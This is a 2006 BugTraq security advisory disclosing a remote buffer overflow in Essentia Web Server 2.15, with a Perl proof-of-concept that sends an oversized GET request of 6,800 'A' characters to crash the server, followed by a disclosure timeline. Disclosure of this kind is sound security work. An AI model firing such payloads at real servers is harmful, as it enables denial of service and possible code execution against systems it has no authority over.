BugTraq
[x0n3-h4ck]Essentia Web Server v.2.15 Buffer Overflow Nov 10 2006 04:57PM
corrado liotta alice it (1 replies)
-=[--------------------ADVISORY-------------------]=-

Essentia Web Server V 2.15

Author:CorryL x0n3-h4ck.org
-=[-----------------------------------------------]=-

-=[+] Application: Essentia Web Server
-=[+] Version: 2.15
-=[+] Vendor's URL: http://www.essencomp.com
-=[+] Platform: Windows
-=[+] Bug type: Buffer overflow
-=[+] Exploitation: Remote
-=[-]
-=[+] Author: CorryL ~ corryl80[at]gmail[dot]com ~
-=[+] Reference: www.x0n3-h4ck.org
-=[+] Virtual Office: http://www.kasamba.com/CorryL

..::[ Descriprion ]::..

Providing enhanced Web Application and Communication Services, this is a high performance scalable web server that supports thousands of virtual servers.

..::[ Bug ]::..

This software is affection from a buffer overflow
what it would allow an attacker to perform arbitrary code
on the system victim.
Sending a GET+Ax6800 request, he would succeed
to write above the seh point.

..::[ Proof Of Concept ]::..

#!/usr/bin/perl

use IO::Socket;

use Getopt::Std; getopts('h:', \%args);

if (defined($args{'h'})) { $host = $args{'h'}; }

print STDERR "\n-=[ Essentia Web Server 2.15 Remote DOS Exploit]=-\n";

print STDERR "-=[ Discovered By CorryL corryl80 (at) gmail (dot) com [email concealed] ]=-\n";

print STDERR "-=[ Coded by CorryL info:www.x0n3-h4ck.org ]=-\n\n";

if (!defined($host)) {

Usage();

}

$dos = "A"x6800;

print "[+] Connect to $host\n";

$socket = new IO::Socket::INET (PeerAddr => "$host",

PeerPort => 80,

Proto => 'tcp');

die unless $socket;

print "[+] Sending DOS byte\n";

$data = "GET /$dos \r\n\r\n";

..::[ Workaround ]::..

nothing

..::[ Disclousure Timeline ]::..

[30/10/2006] - Vendor notification
[04/11/2006] ? No Vendor Response
[04/11/2006] - Public disclousure

[ reply ]
Re: [x0n3-h4ck]Essentia Web Server v.2.15 Buffer Overflow Nov 12 2006 04:51PM
Noam Rathaus (noamr beyondsecurity com)


 

Privacy Statement
Copyright 2010, SecurityFocus